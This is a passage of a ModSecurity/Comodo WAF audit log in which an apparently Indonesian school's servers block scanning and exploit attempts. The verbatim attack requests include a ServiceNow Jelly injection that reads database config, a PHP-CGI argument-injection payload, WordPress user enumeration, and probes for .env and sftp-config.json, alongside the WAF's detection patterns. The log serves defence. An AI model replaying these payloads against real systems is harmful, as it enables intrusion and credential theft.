Data: /etc/ found within REQUEST_URI: /v1/api"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748510928447451 2232 (- - -) Stopwatch2: 1748510928447451 2232; combined=668, p1=399, p2=239, p3=0, p4=0, p5=30, sr=72, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --95ca3770-Z-- --14029503-A-- [29/May/2025:16:28:49 +0700] aDgo0WMaQtTb69S13pgW4wAAAE4 103.236.140.4 55780 103.236.140.4 8181 --14029503-B-- GET /login.do?jvar_page_title=%3Cstyle%3E%3Cj:jelly%20xmlns:j=%22jelly:core%22%20xmlns:g=%27glide%27%3E%3Cg:evaluate%3Ez=new%20Packages.java.io.File(%22%22).getAbsolutePath();z=z.substring(0,z.lastIndexOf(%22/%22));u=new%20SecurelyAccess(z.concat(%22/co..nf/glide.db.properties%22)).getBufferedReader();s=%22%22;while((q=u.readLine())!==null)s=s.concat(q,%22%5Cn%22);gs.addErrorMessage(s);%3C/g:evaluate%3E%3C/j:jelly%3E%3C/style%3E HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (ZZ; Linux x86_64; rv:126.0) Gecko/20100101 Firefox/126.0 Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 153698110 --14029503-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --14029503-E-- --14029503-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i:.{0,399}?(?:@[i\\\\]|(?:[:=]|&#x?0*(?:58|3A|61|3D);?).{0,399}?(?:[(\\\\]|&#x?0*(?:40|28|92|5C);?)))" at MATCHED_VAR. [file "/usr/local/apache/modsecurity-cwaf/rules/07_XSS_XSS.conf"] [line "95"] [id "212880"] [rev "4"] [msg "COMODO WAF: IE XSS Filters - Attack Detected.||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: 206.82.6.62 found within MATCHED_VAR: "] [severity "CRITICAL"] [tag "CWAF"] [tag "XSS"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748510929414704 2550 (- - -) Stopwatch2: 1748510929414704 2550; combined=1405, p1=376, p2=1001, p3=0, p4=0, p5=28, sr=66, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --14029503-Z-- --f8cc4756-A-- [29/May/2025:16:30:02 +0700] aDgpGmMaQtTb69S13pgW6QAAAFE 103.236.140.4 55814 103.236.140.4 8181 --f8cc4756-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 94.152.13.91 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 94.152.13.91 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --f8cc4756-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f8cc4756-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748511002555723 3323 (- - -) Stopwatch2: 1748511002555723 3323; combined=1430, p1=537, p2=862, p3=0, p4=0, p5=31, sr=94, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f8cc4756-Z-- --3563af29-A-- [29/May/2025:17:05:11 +0700] aDgxV31Ye2lUDKzW1LvzIwAAAAY 103.236.140.4 37196 103.236.140.4 8181 --3563af29-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.86.80 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.86.80 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.142 Safari/537.36 Accept-Charset: utf-8 --3563af29-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3563af29-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748513111423101 787 (- - -) Stopwatch2: 1748513111423101 787; combined=342, p1=302, p2=0, p3=0, p4=0, p5=40, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3563af29-Z-- --04cb712e-A-- [29/May/2025:17:22:18 +0700] aDg1Wn1Ye2lUDKzW1LvzKwAAABI 103.236.140.4 37286 103.236.140.4 8181 --04cb712e-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.86.80 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.86.80 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (hp-tablet; Linux; hpwOS/3.0.2; U; de-DE) AppleWebKit/534.6 (KHTML, like Gecko) wOSBrowser/234.40.1 Safari/534.6 TouchPad/1.0 Accept-Charset: utf-8 --04cb712e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --04cb712e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748514138984990 814 (- - -) Stopwatch2: 1748514138984990 814; combined=328, p1=291, p2=0, p3=0, p4=0, p5=37, sr=92, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --04cb712e-Z-- --ac499203-A-- [29/May/2025:17:34:56 +0700] aDg4UGMaQtTb69S13pgbcQAAAEQ 103.236.140.4 37408 103.236.140.4 8181 --ac499203-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 102.164.249.154 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 102.164.249.154 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --ac499203-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ac499203-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748514896163506 2869 (- - -) Stopwatch2: 1748514896163506 2869; combined=1319, p1=419, p2=869, p3=0, p4=0, p5=31, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ac499203-Z-- --4f455a3f-A-- [29/May/2025:17:41:47 +0700] aDg562MaQtTb69S13pgbdAAAAEM 103.236.140.4 37422 103.236.140.4 8181 --4f455a3f-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 185.102.237.144 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 185.102.237.144 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --4f455a3f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4f455a3f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748515307030217 2836 (- - -) Stopwatch2: 1748515307030217 2836; combined=1240, p1=427, p2=778, p3=0, p4=0, p5=35, sr=85, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4f455a3f-Z-- --ec83a902-A-- [29/May/2025:17:50:42 +0700] aDg8AsX5pbyFXv2T3iqAxgAAANU 103.236.140.4 37516 103.236.140.4 8181 --ec83a902-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 47.80.7.53 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 47.80.7.53 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --ec83a902-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ec83a902-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748515842771735 2968 (- - -) Stopwatch2: 1748515842771735 2968; combined=1328, p1=441, p2=856, p3=0, p4=0, p5=30, sr=79, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ec83a902-Z-- --37e5763c-A-- [29/May/2025:17:54:40 +0700] aDg88MX5pbyFXv2T3iqAyAAAAM8 103.236.140.4 37522 103.236.140.4 8181 --37e5763c-B-- POST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3D0+%ADd+disable_functions%3D%22%22+%ADd+allow_url_include%3D1+%ADd+auto_prepend_file%3Dphp://input HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 176.65.138.171 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 176.65.138.171 X-Forwarded-Proto: https Connection: close Content-Length: 110 User-Agent: python-requests/2.32.3 Accept: */* --37e5763c-C-- --37e5763c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --37e5763c-E-- --37e5763c-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd cgi.force_redirect=0 \xadd disable_functions="" \xadd allow_url_include=1 \xadd auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd cgi.force_redirect=0 \x5cxadd disable_functions=\x22\x22 \x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd cgi.force_redirect=0 \xadd disable_functions=\x22\x22 \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748516080072897 3983 (- - -) Stopwatch2: 1748516080072897 3983; combined=2392, p1=503, p2=1848, p3=0, p4=0, p5=41, sr=78, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --37e5763c-Z-- --b4cc1936-A-- [29/May/2025:18:17:59 +0700] aDhCZ2MaQtTb69S13pgbkwAAAE4 103.236.140.4 37664 103.236.140.4 8181 --b4cc1936-B-- GET /sftp-config.json HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 193.32.126.214 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 193.32.126.214 X-Forwarded-Proto: http Connection: close --b4cc1936-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b4cc1936-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/sftp-config.json" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748517479054497 711 (- - -) Stopwatch2: 1748517479054497 711; combined=261, p1=220, p2=0, p3=0, p4=0, p5=41, sr=64, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b4cc1936-Z-- --51c4027c-A-- [29/May/2025:18:49:59 +0700] aDhJ52MaQtTb69S13pgbmgAAAFI 103.236.140.4 37864 103.236.140.4 8181 --51c4027c-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 103.55.7.130 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 103.55.7.130 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --51c4027c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --51c4027c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748519399293485 3177 (- - -) Stopwatch2: 1748519399293485 3177; combined=1432, p1=493, p2=906, p3=0, p4=0, p5=33, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --51c4027c-Z-- --e9af4f28-A-- [29/May/2025:20:08:03 +0700] aDhcM2MaQtTb69S13pgb1AAAAEk 103.236.140.4 38388 103.236.140.4 8181 --e9af4f28-B-- POST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3D0+%ADd+disable_functions%3D%22%22+%ADd+allow_url_include%3D1+%ADd+auto_prepend_file%3Dphp://input HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 176.65.137.136 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 176.65.137.136 X-Forwarded-Proto: http Connection: close Content-Length: 110 User-Agent: python-requests/2.32.3 Accept: */* --e9af4f28-C-- --e9af4f28-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e9af4f28-E-- --e9af4f28-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd cgi.force_redirect=0 \xadd disable_functions="" \xadd allow_url_include=1 \xadd auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd cgi.force_redirect=0 \x5cxadd disable_functions=\x22\x22 \x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd cgi.force_redirect=0 \xadd disable_functions=\x22\x22 \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748524083623404 7032 (- - -) Stopwatch2: 1748524083623404 7032; combined=5248, p1=504, p2=4701, p3=0, p4=0, p5=43, sr=78, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e9af4f28-Z-- --0eb0ec1d-A-- [29/May/2025:20:18:09 +0700] aDhekX1Ye2lUDKzW1LvzmAAAAAI 103.236.140.4 38438 103.236.140.4 8181 --0eb0ec1d-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 14.224.131.29 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.224.131.29 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --0eb0ec1d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0eb0ec1d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748524689949171 3355 (- - -) Stopwatch2: 1748524689949171 3355; combined=1472, p1=500, p2=932, p3=0, p4=0, p5=40, sr=83, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0eb0ec1d-Z-- --73a03d6f-A-- [29/May/2025:20:55:28 +0700] aDhnUGMaQtTb69S13pgcVgAAAEg 103.236.140.4 39798 103.236.140.4 8181 --73a03d6f-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 163.53.83.94 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 163.53.83.94 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --73a03d6f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --73a03d6f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748526928937807 2655 (- - -) Stopwatch2: 1748526928937807 2655; combined=1282, p1=429, p2=826, p3=0, p4=0, p5=27, sr=83, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --73a03d6f-Z-- --bf958f12-A-- [29/May/2025:21:18:37 +0700] aDhsvX1Ye2lUDKzW1Lv09gAAAAQ 103.236.140.4 40896 103.236.140.4 8181 --bf958f12-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 165.232.178.241 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 165.232.178.241 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --bf958f12-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --bf958f12-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748528317564664 701 (- - -) Stopwatch2: 1748528317564664 701; combined=288, p1=250, p2=0, p3=0, p4=0, p5=38, sr=70, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bf958f12-Z-- --91824052-A-- [29/May/2025:21:27:22 +0700] aDhuyn1Ye2lUDKzW1Lv0_gAAAAA 103.236.140.4 41112 103.236.140.4 8181 --91824052-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 202.79.60.153 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 202.79.60.153 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --91824052-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --91824052-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748528842766734 2760 (- - -) Stopwatch2: 1748528842766734 2760; combined=1239, p1=424, p2=785, p3=0, p4=0, p5=30, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --91824052-Z-- --70504835-A-- [29/May/2025:22:33:47 +0700] aDh-W_4vV4CoZ0MKLMMD3AAAAJA 103.236.140.4 41424 103.236.140.4 8181 --70504835-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 143.255.243.182 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 143.255.243.182 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --70504835-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --70504835-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748532827603138 3428 (- - -) Stopwatch2: 1748532827603138 3428; combined=1497, p1=508, p2=956, p3=0, p4=0, p5=33, sr=84, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --70504835-Z-- --c4329112-A-- [29/May/2025:22:47:45 +0700] aDiBoX1Ye2lUDKzW1Lv1SAAAAAo 103.236.140.4 42408 103.236.140.4 8181 --c4329112-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: 